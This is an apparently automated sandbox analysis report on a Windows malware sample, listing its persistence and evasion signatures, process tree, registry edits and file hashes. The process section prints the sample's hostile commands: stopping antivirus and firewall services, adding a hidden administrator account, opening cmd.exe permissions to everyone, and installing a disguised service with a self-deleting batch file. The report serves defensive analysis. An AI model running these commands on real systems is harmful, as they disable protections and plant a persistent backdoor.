Malware Analysis Report

2025-03-15 00:52

Sample ID 240626-s5ga7atfmr
Target 128394c4fa5db44d001d415665c98edf_JaffaCakes118
SHA256 33a37adad6fb9555f45400fcb164140bef02b07fdc8c964ce5b6fc8bc22b7257
Tags
defense_evasion persistence
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

33a37adad6fb9555f45400fcb164140bef02b07fdc8c964ce5b6fc8bc22b7257

Threat Level: Likely malicious

The file 128394c4fa5db44d001d415665c98edf_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion persistence

Grants admin privileges

Event Triggered Execution: Image File Execution Options Injection

Executes dropped EXE

Adds Run key to start application

Modifies WinLogon

Hide Artifacts: Hidden Users

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 15:42

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 15:42

Reported

2024-06-26 15:44

Platform

win7-20240611-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"

Signatures

Grants admin privileges

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe\Debugger = "SoundMan.exe" C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\SoundMan.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe = "C:\\Windows\\system32\\ctfmon.exe" C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1 = "0" C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\interne.exe C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
File created C:\Windows\SysWOW64\ttjj6.ini C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1 = "0" C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoundMan.exe C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
File created C:\Windows\1.inf C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\1.inf C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\SysWOW64\rundll32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\runonce.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1716 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cacls.exe
PID 1716 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cacls.exe
PID 1716 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cacls.exe
PID 1716 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cacls.exe
PID 1716 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2772 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2664 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2784 wrote to memory of 1928 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2784 wrote to memory of 1928 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2784 wrote to memory of 1928 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2784 wrote to memory of 1928 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2772 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2628 wrote to memory of 2680 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\runonce.exe
PID 2628 wrote to memory of 2680 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\runonce.exe
PID 2628 wrote to memory of 2680 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\runonce.exe
PID 2628 wrote to memory of 2680 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\runonce.exe
PID 2684 wrote to memory of 2484 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2684 wrote to memory of 2484 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2684 wrote to memory of 2484 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2684 wrote to memory of 2484 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2772 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2680 wrote to memory of 2520 N/A C:\Windows\SysWOW64\runonce.exe C:\Windows\SysWOW64\grpconv.exe
PID 2680 wrote to memory of 2520 N/A C:\Windows\SysWOW64\runonce.exe C:\Windows\SysWOW64\grpconv.exe
PID 2680 wrote to memory of 2520 N/A C:\Windows\SysWOW64\runonce.exe C:\Windows\SysWOW64\grpconv.exe
PID 2680 wrote to memory of 2520 N/A C:\Windows\SysWOW64\runonce.exe C:\Windows\SysWOW64\grpconv.exe
PID 2512 wrote to memory of 2528 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2512 wrote to memory of 2528 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2512 wrote to memory of 2528 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2512 wrote to memory of 2528 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2772 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2772 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2560 wrote to memory of 1416 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2560 wrote to memory of 1416 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2560 wrote to memory of 1416 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2560 wrote to memory of 1416 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1716 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SoundMan.exe

Processes

C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"

C:\Windows\SysWOW64\cacls.exe

cacls.exe C:\Windows\system32\cmd.exe /e /t /g everyone:F

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net user new1 12369 /add&net user new1 12369&net user new1 /active:yes&net localgroup administrators new1 /add

C:\Windows\SysWOW64\cmd.exe

cmd /c echo [Version]>%windir%\1.inf&echo Signature="$WINDOWS NT$">>%windir%\1.inf&echo [DefaultInstall.Services]>>%windir%\1.inf&echo AddService=helpsvc,,My_AddService_Name>>%windir%\1.inf&echo [My_AddService_Name]>>%windir%\1.inf&echo DisplayName=Help and Support>>%windir%\1.inf&echo Description=启用在此计算机上运行帮助和支持中心。如果停止服务,帮助和支持中心将不可用。如果禁用服务,任何直接依赖于此服务的服务将无法启动。>>%windir%\1.inf&echo ServiceType=0x10>>%windir%\1.inf&echo StartType=2 >>%windir%\1.inf&echo ServiceBinary=%11%\interne.exe>>%windir%\1.inf&echo ErrorControl=0 >>%windir%\1.inf&rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %windir%\1.inf&del %windir%\1.inf&exit

C:\Windows\SysWOW64\net.exe

net user new1 12369 /add

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\Windows\1.inf

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user new1 12369 /add

C:\Windows\SysWOW64\net.exe

net user new1 12369

C:\Windows\SysWOW64\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user new1 12369

C:\Windows\SysWOW64\net.exe

net user new1 /active:yes

C:\Windows\SysWOW64\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user new1 /active:yes

C:\Windows\SysWOW64\net.exe

net localgroup administrators new1 /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup administrators new1 /add

C:\Windows\SoundMan.exe

C:\Windows\SoundMan.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c echo ping 127.1 -n 3 >nul 2>nul >c:\2.bat&echo del C:\Windows\system32\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe>>c:\2.bat&echo del c:\2.bat>>c:\2.bat&c:\2.bat

C:\Windows\SysWOW64\PING.EXE

ping 127.1 -n 3

Network

N/A

Files

memory/1716-0-0x0000000000400000-0x0000000000437000-memory.dmp

C:\Windows\1.inf

MD5 8a3cdcae5040a0e9ffda840903292d09
SHA1 968fb550eec0f3726c1b828a01d0496429502f7c
SHA256 8b5ac0c6629193fec6b4052aa330fe309679a9d248d150cc68e291a54a8a77d9
SHA512 669fdfc661c94be7e6bec7d6fbd2307d7494b4f5c26840ac99d1580ffeaf4b71e96798e5e0d223ebdc676c047e7a3aa3695711613098ded0b942796089c95f3a

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\SoundMan.exe

MD5 1063293cd7bcdafef5dab258a6c55eb6
SHA1 89a06e65acb702df0cb96ef513b042fa01c22ec9
SHA256 c99121e7f999dd4f12583929c3bd6b2f7481b58f42ef7b2cc0e2540c09b80218
SHA512 61c8e730bc9ac5a647ad11500a135028702ac3e9b3c8882e006760d48d662fc736d93ad2e876d050377bf987915998ffbdfa18f8c48a40942903b49856a91f49

memory/1716-34-0x0000000000400000-0x0000000000437000-memory.dmp

memory/1716-37-0x0000000000400000-0x0000000000437000-memory.dmp

C:\2.bat

MD5 6410f1dd47e0842c546c3fca681f6a38
SHA1 bc9e0e091b79b26c389b5c99c9896fd3d73a9bf2
SHA256 4794dcea80d8427d282d6eea007dbf0572b3b2b27dbfe7d7727e5a46eb945a92
SHA512 932a4a1f8ff336952bc4c4250af20d34b6bb0cca86f6e34e1eff019294c7cea1c198fa56d7ae54b6fb5c253489173b7346c2e37a233960d93e523f91aea68e47

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-26 15:42

Reported

2024-06-26 15:44

Platform

win10v2004-20240508-en

Max time kernel

125s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1280,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=4452 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/4664-0-0x0000000000400000-0x0000000000437000-memory.dmp